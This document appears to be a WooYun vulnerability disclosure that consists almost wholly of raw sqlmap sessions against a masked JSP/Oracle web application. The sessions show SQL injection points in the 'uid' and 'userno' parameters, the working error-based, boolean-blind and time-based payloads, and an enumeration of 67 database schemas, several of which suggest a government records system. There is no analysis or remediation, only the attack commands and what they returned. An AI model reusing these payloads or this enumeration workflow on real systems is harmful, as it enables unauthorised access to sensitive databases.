WooYun.org

D:\sqlmap>cmd.exe
Microsoft Windows [版本 6.1.7601]
版权所有 (c) 2009 Microsoft Corporation。保留所有权利。
D:\sqlmap>sqlmap.py -u "http://**.**.**.**:8080//web/ConfigDivServ.jsp?op=showM
odify&uid=%bf" -p "uid" --level 3
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-201511240893}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 23:22:24
[23:22:24] [INFO] resuming back-end DBMS 'oracle'
[23:22:24] [INFO] testing connection to the target URL
sqlmap got a 302 redirect to 'http://**.**.**.**:9080/'. Do you want to follow?
 [Y/n] y
[23:22:26] [INFO] checking if the target is protected by some kind of WAF/IPS/ID
S
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uid (GET)
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)
    Payload: op=showModify&uid=%bf' AND 1079=CTXSYS.DRITHSX.SN(1079,(CHR(113)||C
HR(113)||CHR(113)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (1079=1079) THEN 1 ELSE
 0 END) FROM DUAL)||CHR(113)||CHR(98)||CHR(98)||CHR(120)||CHR(113))) AND 'MmpY'=
'MmpY
---
[23:22:27] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[23:22:27] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\**.**.**.**'
[*] shutting down at 23:22:27
D:\sqlmap>

D:\sqlmap>cmd.exe
Microsoft Windows [版本 6.1.7601]
版权所有 (c) 2009 Microsoft Corporation。保留所有权利。
D:\sqlmap>sqlmap.py -u "http://**.**.**.**:8080//web/ConfigDivServ.jsp?op=showM
odify&uid=%bf" -p "uid" --level 3 --dbs
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-201511240893}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 23:25:20
[23:25:20] [INFO] resuming back-end DBMS 'oracle'
[23:25:20] [INFO] testing connection to the target URL
sqlmap got a 302 redirect to 'http://**.**.**.**:9080/'. Do you want to follow?
 [Y/n] y
[23:25:23] [INFO] checking if the target is protected by some kind of WAF/IPS/ID
S
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uid (GET)
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)
    Payload: op=showModify&uid=%bf' AND 1079=CTXSYS.DRITHSX.SN(1079,(CHR(113)||C
HR(113)||CHR(113)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (1079=1079) THEN 1 ELSE
 0 END) FROM DUAL)||CHR(113)||CHR(98)||CHR(98)||CHR(120)||CHR(113))) AND 'MmpY'=
'MmpY
---
[23:25:24] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[23:25:24] [WARNING] schema names are going to be used on Oracle for enumeration
 as the counterpart to database names on other DBMSes
[23:25:24] [INFO] fetching database (schema) names
[23:25:24] [INFO] the SQL query used returns 67 entries
available databases [67]:
[*] APEX_030200
[*] APPQOSSYS
[*] CCIC_DATA
[*] COLLECT_HOTEL
[*] CTXSYS
[*] DBSNMP
[*] DSG
[*] EXFSYS
[*] FLOWS_FILES
[*] GAB_SJWH
[*] HUAZI_ZDRY
[*] JZ_ZYK
[*] LINEWELL
[*] MDSYS
[*] MOBILE
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] RXBD
[*] SCOTT
[*] SFZ_ZPJY
[*] SPA_ZHIANRKTX
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TC_AQFF
[*] TC_BACKUP
[*] TC_BBS
[*] TC_BFGL
[*] TC_COMMON
[*] TC_DOC
[*] TC_FZZH
[*] TC_HCXT
[*] TC_JCYW
[*] TC_JWGL
[*] TC_JWRJ
[*] TC_JWS
[*] TC_KQ
[*] TC_LYZH
[*] TC_NDZH
[*] TC_NPZH
[*] TC_OA
[*] TC_PHOTO
[*] TC_PORTAL
[*] TC_PTZH
[*] TC_QBXX
[*] TC_QWPT
[*] TC_QZZH
[*] TC_RKXT
[*] TC_SJZH
[*] TC_SMZH
[*] TC_SQJW
[*] TC_SZPT
[*] TC_TOOLS
[*] TC_WEB
[*] TC_WEBJJ
[*] TC_WORKFLOW
[*] TC_XMZH
[*] TC_ZAGL
[*] TC_ZHYY
[*] TC_ZZZH
[*] WBZY
[*] WMSYS
[*] XDB
[*] XXZXDBA
[23:25:24] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\**.**.**.**'
[*] shutting down at 23:25:24
D:\sqlmap>

D:\sqlmap>cmd.exe
Microsoft Windows [版本 6.1.7601]
版权所有 (c) 2009 Microsoft Corporation。保留所有权利。
D:\sqlmap>sqlmap.py -u "http://**.**.**.**:8080/web/web_login_detail.jsp" --dat
a "btn=%b2%e9%d1%af&eddate=01/01/1967&packSize=200&page=1&pageNo=1&totalSize=-1&
userno=1" -p "userno"
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-201511240893}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 23:27:16
[23:27:16] [INFO] resuming back-end DBMS 'oracle'
[23:27:16] [INFO] testing connection to the target URL
[23:27:16] [WARNING] there is a DBMS error found in the HTTP response body which
 could interfere with the results of the tests
[23:27:16] [INFO] checking if the target is protected by some kind of WAF/IPS/ID
S
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: userno (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: btn=%b2%e9%d1%af&eddate=01/01/1967&packSize=200&page=1&pageNo=1&tot
alSize=-1&userno=1' AND 4016=4016 AND 'dMxW'='dMxW
---
[23:27:16] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[23:27:16] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 2 times
[23:27:16] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\**.**.**.**'
[*] shutting down at 23:27:16
D:\sqlmap>

D:\sqlmap>cmd.exe
Microsoft Windows [版本 6.1.7601]
版权所有 (c) 2009 Microsoft Corporation。保留所有权利。
D:\sqlmap>sqlmap.py -u "http://**.**.**.**:8080//web/log_bus_list.jsp?userno=-1
"
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-201511240893}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 23:33:55
[23:33:55] [INFO] resuming back-end DBMS 'oracle'
[23:33:55] [INFO] testing connection to the target URL
[23:33:55] [INFO] checking if the target is protected by some kind of WAF/IPS/ID
S
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: userno (GET)
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: userno=-1' AND 8455=DBMS_PIPE.RECEIVE_MESSAGE(CHR(84)||CHR(72)||CHR
(116)||CHR(74),5) AND 'SvvG'='SvvG
---
[23:33:55] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[23:33:55] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\**.**.**.**'
[*] shutting down at 23:33:55
D:\sqlmap>sqlmap.py -u "http://**.**.**.**:8080//web/log_bus_list.jsp?userno=-1
" --current-db
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-201511240893}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 23:34:16
[23:34:16] [INFO] resuming back-end DBMS 'oracle'
[23:34:16] [INFO] testing connection to the target URL
[23:34:16] [INFO] checking if the target is protected by some kind of WAF/IPS/ID
S
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: userno (GET)
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: userno=-1' AND 8455=DBMS_PIPE.RECEIVE_MESSAGE(CHR(84)||CHR(72)||CHR
(116)||CHR(74),5) AND 'SvvG'='SvvG
---
[23:34:16] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[23:34:16] [INFO] fetching current database
[23:34:16] [INFO] resumed: TC_RKXT
[23:34:16] [WARNING] on Oracle you'll need to use schema names for enumeration a
s the counterpart to database names on other DBMSes
current schema (equivalent to database on Oracle):    'TC_RKXT'
[23:34:16] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\**.**.**.**'
[*] shutting down at 23:34:16
D:\sqlmap>